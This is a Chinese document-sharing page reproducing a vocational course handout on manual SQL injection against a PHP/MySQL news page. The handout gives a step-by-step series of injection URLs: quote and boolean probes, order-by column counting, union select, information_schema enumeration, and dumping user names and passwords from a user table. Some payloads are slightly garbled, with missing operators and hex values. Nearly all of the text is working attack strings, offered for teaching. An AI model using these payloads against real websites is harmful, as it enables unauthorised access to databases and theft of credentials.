计算机网络安全技术与实施(旧) 2013国赛信息安全工具软件教程及视频 PHP爆库攻击整理总结.doc

计算机网络安全技术与实施(旧) 2013国赛信息安全工具软件教程及视频 PHP爆库攻击整理总结.doc

  1. 1、本文档共8页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
网络技术专业教学资源库 国家高等职业教育网络技术专业教学资源库 计算机网络安全技术与实施 课程资源子库 网络安全相关工具软件使用介绍 PHP爆库攻击整理总结 /news.php?id=7901 (原URL) /news.php?id=7901(后面加一个单引号,会发现返回一个和正常页面不同的页面,这说明我们添加的单引号影响了程序的运行结果。此处很可能存在注入点。) /news.php?id=7901 and 1=1 (当添加and 1=1时返回的页面和正常页面是一致的) /news.php?id=7901 and 1=2(当添加and 1=2时返回的页面和正常页面不一致的) 现在我们可以确定此处是一个SQL注入点,程序对带入的参数没有做任何处理,直接带到数据库的查询语句中。 /news.php?id=7901 and ord(mid(version(),1,1))51(发现返回正常页面,说明数据库是mysql,并且版本大于4.0,支持union查询,反之是4.0以下版本或者其他类型数据库。) 暴表中字段: a. /news.php?id=7901 order by 10 返回错误页面,说明字段小于10 b. /news.php?id=7901 order by 5 返回正常页面,说明字段介于5和10之间 c. /news.php?id=7901 order by 6 返回错误页面,说明字段确实是5 这里采用了“二分查找法”,这样可以减少判断次数,节省时间。如果采用从order by 1依次增加数值的方法来判断,需要7次才可以确定字段数,采用“二分查找法”只需要4次就够。当字段数很大时,二分查找法的优势更加明显,效率更高。 下面我们构造如下的语句来确定哪些字段可以在页面上用来显示数据: /news.php?id=0 union select 1,2,3,4,5 构造下面的语句来得到一些数据库信息: /news.php?id=0 union select 1,2,database(),user(),5 根据页面返回信息,我们可以得到如下信息: 数据库名:test 用户名:root@localhost,Web系统和数据库在同一台服务器上 暴表名 /news.php?id=0 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=0limit 0,1 /news.php?id=0 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=0limit 1,1 注:table_schema=[库名],库名要转换成16进制ACS。Limit 0,1中的0表示查询库中第一个表,依此类推。 此处得知用户表名为user 暴字段 /news.php?id=0 union select 1,2,column_name,4,5 from information_schema.columns where table_name=0limit 0,1 暴字段内容 /news.php?id=0 union select 1,2,name,password,5 from test.user

您可能关注的文档

文档评论(0)

WanDocx + 关注
实名认证
内容提供者

大部分文档都有全套资料,如需打包优惠下载,请留言联系。 所有资料均来源于互联网公开下载资源,如有侵权,请联系管理员及时删除。

1亿VIP精品文档

相关文档